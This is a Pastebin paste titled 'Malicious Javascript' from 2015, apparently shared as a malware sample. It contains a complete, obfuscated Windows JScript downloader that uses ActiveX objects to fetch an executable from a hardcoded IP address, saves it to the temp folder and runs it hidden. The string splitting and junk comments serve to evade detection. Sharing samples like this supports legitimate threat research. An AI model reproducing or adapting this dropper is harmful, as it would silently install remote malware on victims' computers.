Advertisement
dynamoo

Malicious Javascript

Nov 24th, 2015
425
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. (function (acMRvoX) {
  2. function ULkwjGJGnWG(ubLrFIZDoYnE)
  3. {
  4. return new acMRvoX.ActiveXObject(ubLrFIZDoYnE)
  5. }
  6. var WuLhqkJdtaacjb = true, jkFZqNhrYZWkwl = ("B.St"+(993982, "ream"));
  7. var PnPtHKXuORqDqyM;
  8. PnPtHKXuORqDqyM = function (HdjxVffbRet, KuRguBRxAJGxrhe, JLKatIaUwWO) {
  9. TUIakctOdZrinn=((1/*s921510nuM400235eOiZ*/)?"WScri":"")+"pt.Shell";
  10. var KHSlcydxPLl = ULkwjGJGnWG(TUIakctOdZrinn);
  11. var shMNTIoeBzQxrfK = "2.XMLHTTP";
  12. var xTqKEAmAM = ULkwjGJGnWG("MSXML"+(368567, shMNTIoeBzQxrfK));
  13. var cTwoWDSh = "%TEMP%\\";
  14. var YgtvBacrl = KHSlcydxPLl.ExpandEnvironmentStrings(cTwoWDSh)
  15. var KuRguBRxAJGxrhe =  YgtvBacrl +(438158262659, KuRguBRxAJGxrhe);
  16. xTqKEAmAM.onreadystatechange = function ()
  17. {
  18. if (xTqKEAmAM.readyState == 4)
  19. {
  20. WuLhqkJdtaacjb = false;
  21. with(ULkwjGJGnWG("ADOD" + jkFZqNhrYZWkwl))
  22. {
  23. open();
  24. type = 1;
  25. write(xTqKEAmAM.ResponseBody);
  26. saveToFile(KuRguBRxAJGxrhe, 2);
  27. close();
  28. return KuRguBRxAJGxrhe;
  29. }
  30. }
  31. }
  32. xTqKEAmAM.open("G" + (3192220, 4175797, /*dca156329zYtzkrxTK455578IlaIWQJrHGjLqXIjNQmXamgjYPW*/ "ET" /*dcazYtzkrx175829TKIlaIWQJr353666HGjLqXIjNQmX585881amgjYPW*/), HdjxVffbRet, false);
  33. xTqKEAmAM.send();
  34. SnThLj = acMRvoX.WScript.Sleep(1100)
  35. while (WuLhqkJdtaacjb) {SnThLj}
  36. if (((new Date())>0,1552))
  37. KHSlcydxPLl.Run(KuRguBRxAJGxrhe, 0, 0);
  38. }
  39. nPoQeLCi = "ht";
  40. /*nPoQeLCixTqKEAmAMULkwjGJGnWG*/
  41. nPoQeLCi += "tp";
  42. PnPtHKXuORqDqyM(nPoQeLCi + "://" + "4"+"6.30.45.7"+"3/mert."+"ex"+"e", "122487254.exe", 1);
  43. })(this)/*173483262009981316486632445154*/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement